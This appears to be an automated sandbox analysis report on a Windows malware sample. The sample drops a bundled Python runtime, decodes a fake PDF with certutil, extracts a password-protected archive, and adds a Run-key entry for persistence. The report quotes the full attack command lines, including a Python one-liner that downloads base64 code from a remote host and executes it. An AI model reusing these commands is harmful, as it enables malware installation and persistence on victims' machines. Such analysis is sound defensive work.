Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pywin32_system32\pythoncom310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\_elementtree.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\pythonservice.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32ts.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32event.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\bits\bits.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32crypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\odbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32security.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\timer.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32profile.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32clipboard.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32pdh.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32print.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\taskscheduler\taskscheduler.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32ras.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pythonwin\win32uiole.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\ifilter\ifilter.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32file.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32wnet.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32net.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\perfmon.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\perfmondata.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\winsound.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\winxpgui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32lz.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32evtlog.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\_winxptheme.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pythonwin\win32ui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32console.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32service.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32pipe.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\propsys\propsys.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32help.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\mapi\mapi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\shell\shell.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32cred.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32process.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\isapi\PyISAPI_loader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32inet.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32transaction.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pythonwin\scintilla.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\_win32sysloader.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\servicemanager.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32api.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_poly1305.pyd	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\timeout.exe TID: 9284

Thread sleep count: 38 > 30

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Thread delayed: delay time: 30000
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Thread delayed: delay time: 21600000

Source: C:\Users\user\Desktop\Images.exe	File opened: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Math\Numbers.py
Source: C:\Users\user\Desktop\Images.exe	File opened: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Math\_IntegerBase.py
Source: C:\Users\user\Desktop\Images.exe	File opened: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Math\Primality.py
Source: C:\Users\user\Desktop\Images.exe	File opened: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Math\Primality.pyi
Source: C:\Users\user\Desktop\Images.exe	File opened: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Math\_IntegerBase.pyi
Source: C:\Users\user\Desktop\Images.exe	File opened: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Math\Numbers.pyi

Source: certutil.exe, 00000033.00000003.14196976988.0000000005312000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 25uYBazrBEbYvVmCi7ocZT4BhTGRgYJdR1Xsv5yOr/4KpD42pbPecNs3vdNbb8Yi
Source: certutil.exe, 00000033.00000003.14196976988.0000000005D12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: GQf1VmCIrnq3R3uKflNC1PyQu5AaFBfE4HREci9SKamoJs9tCQ6gHoyy7uqV36XE
Source: certutil.exe, 00000033.00000003.14196976988.0000000005312000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0n5tP8Och9EKGM8YT4lSOjgo9kOBgDkO2NSlT7tShgFssO16xkjkzFZS9y1acCjK
Source: certutil.exe, 00000033.00000003.14196976988.0000000005312000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gii1Ym1VO1iOBrd+X8t4fdYRCqemUpdfdgwlegzV0fM46kAiNRSHM6KTyBnNZis/
Source: certutil.exe, 00000033.00000003.14196976988.0000000005312000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: uue+lDODj2p3Z0duHGFsZ6WoqCF365bxR8dBj8QZO8/XRUWA4muSt+sqsX8kwIgk
Source: certutil.exe, 00000033.00000003.14196976988.0000000005D12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FTjOD6tIg9d8+8QxEP84SGrFANJlLjOBrWT8uV1J+NDdQVcG6SkvmCIsFC37Q0Zi
Source: certutil.exe, 00000033.00000003.14196976988.0000000005D12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xHpsVTPQxc185zrO0xkdeaXYEAapO0e+ctqrWW3poVmCIwLPCrpZHD8yzpskPLS6
Source: certutil.exe, 00000033.00000003.14196976988.0000000005312000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o8pvSBsy9IXcAZWn/tdFTZBXptg5nw0SSTfE+6LLNQXdSdexyzISj18MqEmupdBJ
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14090138013.000000006CCC6000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: AVy1D8OGsimhXktWVMcif
Source: certutil.exe, 00000033.00000003.14196976988.0000000005D12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nhQ0uSRYDizdQITOoUJ+ooI9ChnOcV60Zp0RGjePFKGnQEmUJMNdI+b8dG2zBVxp
Source: certutil.exe, 00000033.00000003.14196976988.0000000005312000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rjONAgXErQEmuJlUMEFpbBvo21Wh4Yyi1PM6YeRaBXaYS3iDhaU7knlifLtxSvB2
Source: certutil.exe, 00000033.00000003.14196976988.0000000005312000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ERmZmApcNnQqhGFsoFCRpgJ666rjyQEgjlmHtctBLNGbAXIegOr3j0r28xUia1gb
Source: certutil.exe, 00000033.00000003.14196976988.0000000005312000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 7fzeRxqjuvBxoORWCuEQqEMU9ce0v6amx050lAAEJd+GbwgrcLLcjn1LEKzIC60G
Source: certutil.exe, 00000033.00000003.14196976988.0000000005312000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: w0MECYnBGk9AFiO1gZw5fxJD5NwmfQeMuOO17OQRsnxijdbBKyGO4i6+XLK47cet
Source: certutil.exe, 00000033.00000003.14196976988.0000000005312000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hmUiQJ9RD6yygoVaNoVMCICzcaDEufbZSWxhFpLoKTTXrKxa/WUrO+zJg+yaVAgg
Source: certutil.exe, 00000033.00000003.14196976988.0000000005312000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: goa2T5GvnHGFSmjE8KysMCZ52skLKbBo6coLTJDwTcG7+JpH9YUwOcLwl2m7AFPs
Source: certutil.exe, 00000033.00000003.14196976988.0000000005312000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TGZ/sf5z4w7pN2wGNtkwYMZo32ITR9LGf/hgFSN2PK5BdThI+COLyJQpfdHItmg1
Source: certutil.exe, 00000033.00000003.14196976988.0000000005D12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SWgL4V2vMcio0HEIaj1i/G25yOq4hdsyCfEKb0xpVNqHmChpAZpEeJuPfMxkgq5Q
Source: certutil.exe, 00000033.00000003.14196976988.0000000005D12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: aGvMKswLd4hYW3GTgxYLuQL9WqeMUHQFbUGl6oBvHXxIFFUsb7hGSm2MVG+Y/WFS
Source: AdobeCollabSync.exe, 0000003A.00000002.14264504047.000001F134EB8000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000003B.00000002.14228407133.0000013FBCC84000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

HIPS / PFW / Operating System Protection Evasion

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Document.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib -s -h -r VERSION.DLL	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -decode Document.pdf DzbIZ1HRMj.rar	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Desktop\Images.exe images x -pAnfoE5FeC6R5dPfRbxQgKMtZdV6v0OKC -inul -y DzbIZ1HRMj.rar C:\Users\Public\VIP4YmtQLN	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\VIP4YmtQLN\synaptics.exe "C:\Users\Public\VIP4YmtQLN\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://zwaregroup.com/buildergroup/cgi-bin/bin/Adonis/Adonis_ALL').text))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode "C:\Users\Public\Windows Service.~b64" "C:\Users\Public\Windows Service.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Service.bat" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\LSBIHQFDVT.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\QNCYCDFIJJ.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\SUAVTZKNFL.pdf"	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=gpu-process --no-sandbox --log-severity=disable --lang=en-US --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --mojo-platform-channel-handle=1504 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:2
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --lang=en-US --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --mojo-platform-channel-handle=1828 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=renderer --log-severity=disable --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --first-renderer-process --no-sandbox --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=5213362510 --mojo-platform-channel-handle=2228 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=renderer --log-severity=disable --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --no-sandbox --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --launch-time-ticks=5213441251 --mojo-platform-channel-handle=2300 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=gpu-process --no-sandbox --log-severity=disable --lang=en-US --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --mojo-platform-channel-handle=2340 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:2
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=renderer --log-severity=disable --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --no-sandbox --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --launch-time-ticks=5225407327 --mojo-platform-channel-handle=2916 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\VIP4YmtQLN\synaptics.exe "C:\Users\Public\VIP4YmtQLN\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://zwaregroup.com/buildergroup/cgi-bin/bin/Adonis/Adonis_ALL').text))"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "c:\program files\adobe\acrobat dc\acrobat\ngl\cefworkflow\adobe_licensing_wf_helper_acro.exe" --type=gpu-process --no-sandbox --log-severity=disable --lang=en-us --cef-dll-path="c:\program files\adobe\acrobat dc\acrobat\acrocef_1" --gpu-preferences=uaaaaaaaaadgacayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --use-gl=angle --use-angle=swiftshader-webgl --log-file="c:\program files\adobe\acrobat dc\acrobat\ngl\cefworkflow\debug.log" --mojo-platform-channel-handle=1504 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=webrtchidelocalipswithmdns /prefetch:2
